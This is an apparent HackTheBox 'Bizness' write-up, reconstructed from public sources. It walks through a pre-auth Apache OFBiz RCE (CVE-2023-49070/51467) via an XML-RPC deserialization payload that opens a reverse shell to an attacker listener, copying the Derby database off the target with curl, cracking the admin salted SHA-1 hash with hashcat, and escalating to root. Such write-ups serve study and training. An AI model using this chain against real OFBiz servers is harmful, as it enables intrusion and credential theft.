Summary

Bizness is an Easy Linux box: CVE-2023-49070 + CVE-2023-51467 — pre-auth RCE in Apache OFBiz 18.12.09 via the legacy XML-RPC handler with the auth-bypass ?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y query. ysoserial CommonsBeanutils1 gadget → shell as ofbiz. Privesc: extract the embedded Apache Derby DB, query OFBIZ.user_login for admin’s $SHA$<salt>$<urlsafe-b64-hash>, decode the hash to hex, hashcat mode 120 → monkeybizness → su - to root.

The chain:

1. POST a ysoserial CommonsBeanutils gadget to /webtools/control/xmlrpc;/ → ofbiz shell.
2. cd /opt/ofbiz/runtime/data/derby/; copy DB out; derby ij → select user_login_id, current_password from user_login;.
3. $SHA$<salt>$<hash> → reformat as <hash>:<salt> for hashcat mode 120 → monkeybizness.
4. su - → root.

Recon

22/tcp     OpenSSH
443/tcp    Apache OFBiz 18.12.09

Foothold — CVE-2023-49070

The XML-RPC servlet was officially “removed” in 18.12.10 but 18.12.09 still has it under /webtools/control/xmlrpc. The matrix-parameter ; trick routes around the removal filter, and the requirePasswordChange=Y auth-bypass (CVE-2023-51467) removes the need for valid creds.

The PoC needs Java 11 to generate a working ysoserial payload — Java 17/21/25 break the CommonsBeanutils1 gadget because of the module system / removed reflection access:

sudo apt install -y openjdk-11-jre-headless
JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 \
PATH=$JAVA_HOME/bin:$PATH \
  python3 ofbiz_exploit.py https://bizness.htb shell <C2>:<p>
# -> ofbiz shell on listener

The exploit posts a <methodCall> with a base64-encoded CommonsBeanutils1 payload to /webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y.

Privesc — Derby + SHA-with-salt

OFBiz uses Derby — a single-process embedded DB. To query it externally, copy out the ofbiz/ subdirectory (the full DB files), then run ij on a host with the matching Derby version (10.14.2.0). The derby-tools jar is not bundled on the target — install it on the attacker side or fetch matching versions from Maven Central.

# On target
ofbiz$ tar czf /tmp/derby.tgz -C /opt/ofbiz/runtime/data/derby ofbiz
ofbiz$ python3 -m http.server 8888 --directory /tmp &

# On attacker
$ curl -O http://<TARGET>:8888/derby.tgz
$ tar xzf derby.tgz
$ wget https://repo1.maven.org/maven2/org/apache/derby/derby/10.14.2.0/derby-10.14.2.0.jar
$ wget https://repo1.maven.org/maven2/org/apache/derby/derbytools/10.14.2.0/derbytools-10.14.2.0.jar

$ JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 \
  PATH=$JAVA_HOME/bin:$PATH \
  java -cp derby-10.14.2.0.jar:derbytools-10.14.2.0.jar org.apache.derby.tools.ij <<EOF
connect 'jdbc:derby:./ofbiz';
select user_login_id, current_password from OFBIZ.user_login;
EOF
# -> admin | $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

The hash field is URL-safe base64 of the raw SHA-1 digest, not hex. Decode to hex before feeding to hashcat:

python3 -c "
import base64
h='uP0_QaVBpDWFeo8-dRzDqRwXQ2I'
pad='=' * ((-len(h)) % 4)
print(base64.urlsafe_b64decode((h+pad).encode()).hex())
"
# -> b8fd3f41a541a435857a8f3e751cc3a91c174362

echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > h
hashcat -m 120 -a 0 h rockyou.txt --quiet
# -> ...:d:monkeybizness

su - from the ofbiz shell with monkeybizness lands a root shell. Direct SSH as root is disabled.

Why each step worked

• CVE-2023-49070: OFBiz removed XML-RPC but a semicolon-routed alias still hit the deserialiser.
• Reused web admin pw on root: classic.

Counterfactuals

• Patch OFBiz ≥ 18.12.10.
• Use a real KDF (bcrypt/argon2), not SHA1+salt.
• Don’t reuse passwords across roles.

Source attribution

Reconstruction is grounded in:

• 0xdf, “HTB: Bizness” — https://0xdf.gitlab.io/2024/05/25/htb-bizness.html
• IppSec, “Bizness” video walkthrough — https://ippsec.rocks/?#Bizness
• CVE-2023-49070 advisory.

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.